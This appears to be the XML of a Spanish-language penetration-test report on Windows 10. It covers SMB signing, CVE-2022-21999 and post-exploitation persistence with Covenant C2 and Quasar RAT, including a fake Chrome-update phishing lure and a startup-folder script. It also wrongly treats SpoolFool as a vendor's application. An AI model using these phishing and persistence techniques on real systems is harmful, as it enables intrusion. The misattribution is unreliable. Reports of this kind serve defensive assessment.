    <w:p w14:paraId="4F22BC5D" w14:textId="2E5D226F" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45FECB26" wp14:editId="4DC09690">
            <wp:extent cx="6645910" cy="4421505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="877620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20205" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId360">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4421505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CF408" w14:textId="77777777" w:rsidR="008A786A" w:rsidRDefault="008A786A" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA5D4DE" w14:textId="5CA5CDE3" w:rsidR="00682B0C" w:rsidRDefault="008A786A" w:rsidP="00682B0C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00682B0C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00682B0C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00682B0C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>otra vulnerabilidad que encontramos es</w:t>
      </w:r>
      <w:r w:rsidR="00682B0C" w:rsidRPr="00682B0C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00682B0C" w:rsidRPr="00682B0C">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SMB (Server Message Block)</w:t>
      </w:r>
      <w:r w:rsidR="00682B0C">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26231A92" w14:textId="5FD86EC1" w:rsidR="00682B0C" w:rsidRPr="00682B0C" w:rsidRDefault="00682B0C" w:rsidP="00682B0C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266C1925" w14:textId="5F33EF96" w:rsidR="00682B0C" w:rsidRPr="00682B0C" w:rsidRDefault="00682B0C" w:rsidP="00682B0C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00682B0C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s un protocolo de red utilizado por los sistemas operativos Windows para compartir archivos, impresoras y otros recursos en una red. La vulnerabilidad "SMB Signing not required" se refiere a la configuración de un servidor SMB que no requiere la firma digital de los mensajes enviados por los clientes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D20AE44" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Impacto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA4291" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>La explotación exitosa de la vulnerabilidad SMB Signing not required puede tener las siguientes consecuencias:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6882AC" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interceptación y manipulación de datos: Un atacante puede interceptar y manipular los datos transmitidos a través del protocolo SMB, lo que puede llevar a la manipulación de archivos, la inyección de malware o la suplantación de identidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A0410" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Robo de credenciales: Al interceptar las comunicaciones SMB, un atacante puede obtener credenciales de inicio de sesión y otros datos confidenciales, lo que les permite acceder a sistemas y recursos protegidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A8BCA" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Acceso no autorizado: Al obtener acceso a las comunicaciones SMB sin ser detectado, un atacante puede aprovechar esto para acceder a sistemas, compartir archivos o imprimir documentos sin permiso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE42EB" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70542F32" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Recomendaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A381EE" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Para mitigar los riesgos asociados con la vulnerabilidad SMB Signing not required, se sugieren las siguientes medidas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC6F89" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Habilitar SMB Signing: Asegúrese de que la opción SMB Signing esté habilitada y configurada para requerir su uso en todos los sistemas Windows. Esto ayudará a garantizar la integridad y autenticidad de las comunicaciones SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0FC012" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implementar cifrado: Considere implementar el cifrado de las comunicaciones SMB utilizando el protocolo SMB versión 3 o superior. Esto proporciona una capa adicional de seguridad para proteger los datos transmitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48628F" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uso de VPN: Utilice una VPN (Red Privada Virtual) para proteger las comunicaciones SMB a través de redes no confiables, como conexiones a través de Internet. Esto ayuda a garantizar la confidencialidad y seguridad de los datos transmitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F9D0A1" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E549FD">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Actualización de sistemas y parches: Mantenga todos los sistemas actualizados con los últimos parches y actualizaciones de seguridad proporcionados por los proveedores de software. Esto ayuda a cerrar posibles vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F685110" w14:textId="77777777" w:rsidR="00E549FD" w:rsidRPr="00E549FD" w:rsidRDefault="00E549FD" w:rsidP="00E549FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD54B40" w14:textId="77777777" w:rsidR="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF358A">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidad de Escalada de Privilegios CVE-2022-21999 en SpoolFool (Windows 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FAD999" w14:textId="77777777" w:rsidR="00CF358A" w:rsidRPr="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E9AE95" w14:textId="77777777" w:rsidR="00CF358A" w:rsidRPr="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF358A">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C816C" w14:textId="77777777" w:rsidR="00CF358A" w:rsidRPr="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF358A">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>La vulnerabilidad CVE-2022-21999 es una vulnerabilidad de escalada de privilegios local que afecta a la aplicación SpoolFool en entornos Windows. Esta vulnerabilidad se debe a una falta de validación adecuada de los datos proporcionados al componente Spooler de impresión del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7F739" w14:textId="03941BF4" w:rsidR="0056442C" w:rsidRPr="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF358A">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Un atacante local puede aprovechar esta vulnerabilidad al enviar datos especialmente diseñados al Spooler de impresión, lo que puede permitir la ejecución de código arbitrario con privilegios elevados en el sistema. Al explotar con éxito esta vulnerabilidad, el atacante obtiene un control total sobre el sistema comprometido y puede llevar a cabo actividades maliciosas, como el acceso a datos confidenciales, la modificación de archivos críticos o la instalación de malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077587C0" w14:textId="77777777" w:rsidR="00CF358A" w:rsidRPr="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF358A">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Impacto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E58739" w14:textId="77777777" w:rsidR="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF358A">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>La explotación exitosa de la vulnerabilidad CVE-2022-21999 en SpoolFool permite a un atacante local obtener privilegios de sistema en el sistema objetivo. Esto implica que el atacante puede ejecutar acciones con los máximos privilegios, lo que pone en riesgo la seguridad y la integridad de los datos almacenados en el sistema. Además, esta vulnerabilidad podría facilitar el movimiento lateral dentro de la red y permitir al atacante comprometer otros sistemas conectados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53A1A8" w14:textId="1ACF5037" w:rsidR="00CF358A" w:rsidRPr="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF358A">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Defensa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028395B0" w14:textId="77777777" w:rsidR="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF358A">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Actualización y parcheo: Se recomienda encarecidamente a los administradores del sistema que apliquen los parches y actualizaciones más recientes proporcionados por el proveedor de SpoolFool. Estos parches suelen incluir correcciones de seguridad que abordan las vulnerabilidades conocidas, incluyendo CVE-2022-21999.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD2B5C5" w14:textId="3972C335" w:rsidR="00CF358A" w:rsidRPr="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Desactivar el servicio de impresión en el caso de que no se use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980A9BA" w14:textId="77777777" w:rsidR="00CF358A" w:rsidRPr="00CF358A" w:rsidRDefault="00CF358A" w:rsidP="00CF358A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383D1242" w14:textId="521E9824" w:rsidR="008A786A" w:rsidRDefault="00A60D03" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60D03">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PostExplotacion (Covenenant C2 y Quasar RAT)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E0E6B" w14:textId="77777777" w:rsidR="00A60D03" w:rsidRDefault="00A60D03" w:rsidP="000926EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F330B18" w14:textId="33CC2288" w:rsidR="00A60D03" w:rsidRDefault="00A60D03" w:rsidP="00A60D03">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60D03">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Se consigue ganar persistencia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> mediante estos dos métodos, Covenant C2 se consigue instalar mediante un ataque phishing en el cual se le indica al usuario que hay una nueva versión de Google Chrome disponible, al pinchar en el enlace se descargar el código que se comunicará con Covenant, y al ejecutarlo se comprometerá la máquina</w:t>
      </w:r>
      <w:r w:rsidR="00530607">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAB76F4" w14:textId="0C2FD87D" w:rsidR="00A60D03" w:rsidRDefault="00A60D03" w:rsidP="00A60D03">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Creando un script que se ejecutará </w:t>
      </w:r>
      <w:r w:rsidR="00D0604A">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>al iniciar el sistema en la ruta del usuario AppData/Roaming/Microsoft/Windows/MenuInicio/Programas/startup.bat, el cual ejecutará el código para crear una conexión con Covenanat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F9C17E" w14:textId="6A0357BC" w:rsidR="00D0604A" w:rsidRPr="00A60D03" w:rsidRDefault="00D0604A" w:rsidP="00A60D03">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D49A87B" wp14:editId="287F506E">
            <wp:extent cx="6645910" cy="2140585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="256626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6900" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId361">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2140585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C882A81" w14:textId="21C19547" w:rsidR="00A60D03" w:rsidRPr="00530607" w:rsidRDefault="00D0604A" w:rsidP="00D0604A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530607">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Con Quasar</w:t>
      </w:r>
      <w:r w:rsidR="00530607" w:rsidRPr="00530607">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> crearemos una conexión con el equipo Windows 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488720E" w14:textId="7708651D" w:rsidR="00530607" w:rsidRPr="00530607" w:rsidRDefault="00530607" w:rsidP="00D0604A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530607">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="181BF463" wp14:editId="68EBFEEB">
            <wp:extent cx="6645910" cy="755015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1253726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6180" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId362">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986CFDA" w14:textId="5B758455" w:rsidR="00530607" w:rsidRDefault="00530607" w:rsidP="00D0604A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530607">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Y creando persistencia:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F4EA0F" w14:textId="77777777" w:rsidR="00530607" w:rsidRDefault="00530607" w:rsidP="00D0604A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BCAA0D" w14:textId="3ED1BBED" w:rsidR="00530607" w:rsidRDefault="00530607" w:rsidP="00D0604A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F2345AC" wp14:editId="5BF40923">
            <wp:extent cx="6645910" cy="4797425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1220354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54379" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId363">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4797425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E5C16" w14:textId="77777777" w:rsidR="00530607" w:rsidRDefault="00530607" w:rsidP="00D0604A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526DE768" w14:textId="225C1DD2" w:rsidR="00530607" w:rsidRDefault="00530607" w:rsidP="00D0604A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Simplemente marcando la opción de que se inicie el cliente cuando el ordenador encienda, y la ruta donde vamos a guardar ese ejecutable que nos permitirá la conexión</w:t>
      </w:r>
      <w:r w:rsidR="00A34DB2">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A41141" w14:textId="6CF18449" w:rsidR="00A34DB2" w:rsidRPr="00530607" w:rsidRDefault="00A34DB2" w:rsidP="00D0604A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
